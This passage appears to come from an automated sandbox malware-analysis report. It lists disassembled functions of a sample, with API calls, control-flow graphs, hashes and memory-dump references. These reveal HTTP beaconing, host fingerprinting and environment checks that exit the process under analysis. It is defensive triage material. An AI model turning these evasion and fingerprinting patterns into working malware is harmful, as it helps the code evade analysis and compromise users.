                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                  • String ID: ERROR$GET
                                  • API String ID: 3687753495-3591763792
                                  • Opcode ID: 71ea1f2f8943887d159942d07ac1721f3e15048d9d638526e8206d62c5a33c6c
                                  • Instruction ID: dded1c114b60cf1396a9146c98e04c1c7174d76c3b78466c62537884ce279cc9
                                  • Opcode Fuzzy Hash: 71ea1f2f8943887d159942d07ac1721f3e15048d9d638526e8206d62c5a33c6c
                                  • Instruction Fuzzy Hash: 6F819E71E01219ABEB20DFA5DC49BEE77B9AF44710F044068F915EB280DB78ED449FA4
                                  Function 00FCF2F8 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 391stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(01B85710), ref: 00FCF315
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCF3A3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCF3C7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCF47B
                                  • lstrcpy.KERNEL32(00000000,01B85710), ref: 00FCF4BB
                                  • lstrcpy.KERNEL32(00000000,01B99008), ref: 00FCF4EA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCF59E
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FCF61C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCF64C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCF69A
                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 00FCF718
                                  • lstrlen.KERNEL32(01B98F68), ref: 00FCF746
                                  • lstrcpy.KERNEL32(00000000,01B98F68), ref: 00FCF771
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCF793
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCF7E4
                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 00FCFA32
                                  • lstrlen.KERNEL32(01B98F78), ref: 00FCFA60
                                  • lstrcpy.KERNEL32(00000000,01B98F78), ref: 00FCFA8B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCFAAD
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCFAFE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID: ERROR
                                  • API String ID: 367037083-2861137601
                                  • Opcode ID: 40e459476420e9e4b678e67701e10f16c0ce1e903719cc252cb7e9e15aab968d
                                  • Instruction ID: cfba8451912fd6bf03d8441a06dd989daa6792d480dd42ad8885e147544190e5
                                  • Opcode Fuzzy Hash: 40e459476420e9e4b678e67701e10f16c0ce1e903719cc252cb7e9e15aab968d
                                  • Instruction Fuzzy Hash: 1BF13B30A01206CFDB28CFA9C645B59F7E6BF44324B1980BED4199B355D736DC8AEB40
                                  Function 00FC8CA0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 176COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2721 fc8ca0-fc8cc4 StrCmpCA 2722 fc8ccd-fc8ce6 2721->2722 2723 fc8cc6-fc8cc7 ExitProcess 2721->2723 2725 fc8cec-fc8cf1 2722->2725 2726 fc8ee2-fc8eef call fb2a20 2722->2726 2727 fc8cf6-fc8cf9 2725->2727 2729 fc8cff 2727->2729 2730 fc8ec3-fc8edc 2727->2730 2732 fc8dbd-fc8dcb StrCmpCA 2729->2732 2733 fc8ddd-fc8deb StrCmpCA 2729->2733 2734 fc8dfd-fc8e0b StrCmpCA 2729->2734 2735 fc8e1d-fc8e2b StrCmpCA 2729->2735 2736 fc8e3d-fc8e4b StrCmpCA 2729->2736 2737 fc8d5a-fc8d69 lstrlen 2729->2737 2738 fc8e56-fc8e64 StrCmpCA 2729->2738 2739 fc8d30-fc8d3f lstrlen 2729->2739 2740 fc8e6f-fc8e7d StrCmpCA 2729->2740 2741 fc8e88-fc8e9a lstrlen 2729->2741 2742 fc8d84-fc8d92 StrCmpCA 2729->2742 2743 fc8da4-fc8db8 StrCmpCA 2729->2743 2744 fc8d06-fc8d15 lstrlen 2729->2744 2730->2726 2770 fc8cf3 2730->2770 2732->2730 2761 fc8dd1-fc8dd8 2732->2761 2733->2730 2745 fc8df1-fc8df8 2733->2745 2734->2730 2746 fc8e11-fc8e18 2734->2746 2735->2730 2747 fc8e31-fc8e38 2735->2747 2736->2730 2748 fc8e4d-fc8e54 2736->2748 2757 fc8d6b-fc8d70 call fb2a20 2737->2757 2758 fc8d73-fc8d7f call fb2930 2737->2758 2738->2730 2751 fc8e66-fc8e6d 2738->2751 2755 fc8d49-fc8d55 call fb2930 2739->2755 2756 fc8d41-fc8d46 call fb2a20 2739->2756 2740->2730 2752 fc8e7f-fc8e86 2740->2752 2753 fc8e9c-fc8ea1 call fb2a20 2741->2753 2754 fc8ea4-fc8eb0 call fb2930 2741->2754 2742->2730 2760 fc8d98-fc8d9f 2742->2760 2743->2730 2749 fc8d1f-fc8d2b call fb2930 2744->2749 2750 fc8d17-fc8d1c call fb2a20 2744->2750 2745->2730 2746->2730 2747->2730 2748->2730 2779 fc8eb3-fc8eb5 2749->2779 2750->2749 2751->2730 2752->2730 2753->2754 2754->2779 2755->2779 2756->2755 2757->2758 2758->2779 2760->2730 2761->2730 2770->2727 2779->2730 2780 fc8eb7-fc8eb9 2779->2780 2780->2730 2781 fc8ebb-fc8ebd lstrcpy 2780->2781 2781->2730
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: cb448270bcff1761e3f72c963b0fc81993d857d98f6a53e1c61ad17c83a6363e
                                  • Instruction ID: b15bf64f94ea8624947405ddb9ad58360bf735a7cbdeed1bfce7c68f07a15dfd
                                  • Opcode Fuzzy Hash: cb448270bcff1761e3f72c963b0fc81993d857d98f6a53e1c61ad17c83a6363e
                                  • Instruction Fuzzy Hash: 35519D71A047469BC720AFF6DA86F6B7BF8BB04744B10086DE452D7600DB78E482BB21
                                  Function 00FD2740 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2782 fd2740-fd2783 GetWindowsDirectoryA 2783 fd278c-fd27ea GetVolumeInformationA 2782->2783 2784 fd2785 2782->2784 2785 fd27ec-fd27f2 2783->2785 2784->2783 2786 fd2809-fd2820 GetProcessHeap RtlAllocateHeap 2785->2786 2787 fd27f4-fd2807 2785->2787 2788 fd2826-fd2844 wsprintfA 2786->2788 2789 fd2822-fd2824 2786->2789 2787->2785 2790 fd285b-fd2872 call fd71e0 2788->2790 2789->2790
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 00FD277B
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FC93B6,00000000,00000000,00000000,00000000), ref: 00FD27AC
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FD280F
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FD2816
                                  • wsprintfA.USER32 ref: 00FD283B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                                  • String ID: :\$C
                                  • API String ID: 2572753744-3309953409
                                  • Opcode ID: d632d1fd5bfa2b8c25c445cf42696fcc4e352699605d4ac31692d18fa5d18011
                                  • Instruction ID: 574ab46c49892d268f183085f9b3583ad3d34b2fdb5c68c91b086fa4c3617f46
                                  • Opcode Fuzzy Hash: d632d1fd5bfa2b8c25c445cf42696fcc4e352699605d4ac31692d18fa5d18011
                                  • Instruction Fuzzy Hash: C93172B1D082099BCB14CFF88A85AEFFFBDEF58710F14016AE515F7644E2348A408BA1
                                  Function 00FB4BC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50stringnetworkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2793 fb4bc0-fb4bce 2794 fb4bd0-fb4bd5 2793->2794 2794->2794 2795 fb4bd7-fb4c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call fb2a20 2794->2795
                                  APIs
                                  • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00FB4BF7
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00FB4C01
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00FB4C0B
                                  • lstrlen.KERNEL32(?,00000000,?), ref: 00FB4C1F
                                  • InternetCrackUrlA.WININET(?,00000000), ref: 00FB4C27
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??2@$CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1683549937-4251816714
                                  • Opcode ID: 65e33435c4c3da59c7f2f61bf22326a9981c801c7a8ea4a3115ce37943e450d0
                                  • Instruction ID: 3158eb38d46e47041d02c1875b9bf4b7f45a3a165626955ce47b1bdd04b6fd85
                                  • Opcode Fuzzy Hash: 65e33435c4c3da59c7f2f61bf22326a9981c801c7a8ea4a3115ce37943e450d0
                                  • Instruction Fuzzy Hash: 5E012D71D00218ABDB14DFA9E845B9EBBF8EB48320F008166F914E7390DB7459048FD5
                                  Function 00FB1030 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2798 fb1030-fb1055 GetCurrentProcess VirtualAllocExNuma 2799 fb105e-fb107b VirtualAlloc 2798->2799 2800 fb1057-fb1058 ExitProcess 2798->2800 2801 fb107d-fb1080 2799->2801 2802 fb1082-fb1088 2799->2802 2801->2802 2803 fb108a-fb10ab VirtualFree 2802->2803 2804 fb10b1-fb10b6 2802->2804 2803->2804
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00FB1046
                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00FB104D
                                  • ExitProcess.KERNEL32 ref: 00FB1058
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00FB106C
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 00FB10AB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                  • String ID:
                                  • API String ID: 3477276466-0
                                  • Opcode ID: 34724c8c018cb20f8a406b362e48f901f70d3e6040b1980e52f0fdcacfbaa13c
                                  • Instruction ID: f6c77e88ec74e036be984ad6b3968062d7a64421e4ec2338d99b2c918665eaa6
                                  • Opcode Fuzzy Hash: 34724c8c018cb20f8a406b362e48f901f70d3e6040b1980e52f0fdcacfbaa13c
                                  • Instruction Fuzzy Hash: DE01F9717402087BE73456E56C59F9B7BEDB744B15F604424F704EB2C0D971E9409A64
                                  Function 00FCEE90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2805 fcee90-fceeb5 call fb2930 2808 fceec9-fceecd call fb6c40 2805->2808 2809 fceeb7-fceebf 2805->2809 2812 fceed2-fceee8 StrCmpCA 2808->2812 2809->2808 2810 fceec1-fceec3 lstrcpy 2809->2810 2810->2808 2813 fceeea-fcef02 call fb2a20 call fb2930 2812->2813 2814 fcef11-fcef18 call fb2a20 2812->2814 2823 fcef04-fcef0c 2813->2823 2824 fcef45-fcefa0 call fb2a20 * 10 2813->2824 2820 fcef20-fcef28 2814->2820 2820->2820 2822 fcef2a-fcef37 call fb2930 2820->2822 2822->2824 2831 fcef39 2822->2831 2823->2824 2827 fcef0e-fcef0f 2823->2827 2830 fcef3e-fcef3f lstrcpy 2827->2830 2830->2824 2831->2830
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCEEC3
                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 00FCEEDE
                                  • lstrcpy.KERNEL32(00000000,ERROR), ref: 00FCEF3F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID: ERROR
                                  • API String ID: 3722407311-2861137601
                                  • Opcode ID: ae2f2c44cfafb5528a29a75ad98603bd71f7646317eaf313597dd88cd9e07b28
                                  • Instruction ID: ec3859cf6ff00162e3e92d5f2a01f24aab7494e0fccc5abc6c90c1c1c5e9cb08
                                  • Opcode Fuzzy Hash: ae2f2c44cfafb5528a29a75ad98603bd71f7646317eaf313597dd88cd9e07b28
                                  • Instruction Fuzzy Hash: A8210371A202465BCB65FF7ADD46BDA37A8AF10314F04542CB84ADB242DB38E844BB90
                                  Function 00FB10C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2886 fb10c0-fb10cb 2887 fb10d0-fb10dc 2886->2887 2889 fb10de-fb10f3 GlobalMemoryStatusEx 2887->2889 2890 fb1112-fb1114 ExitProcess 2889->2890 2891 fb10f5-fb1106 2889->2891 2892 fb111a-fb111d 2891->2892 2893 fb1108 2891->2893 2893->2890 2894 fb110a-fb1110 2893->2894 2894->2890 2894->2892
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 803317263-2766056989
                                  • Opcode ID: 1f81ad1cb16e2fc8e8aad60c250188a9875f0030b35be35bee8d0932723d41e9
                                  • Instruction ID: e95e0156f1222d1bf00f8da263843405dc36fbc3b20f4712a45f23f88abd5f5b
                                  • Opcode Fuzzy Hash: 1f81ad1cb16e2fc8e8aad60c250188a9875f0030b35be35bee8d0932723d41e9
                                  • Instruction Fuzzy Hash: 36F02E7060824C47F71479AAD82535DF7DCFB003A0F900539DEA6C2180E230C850AA27
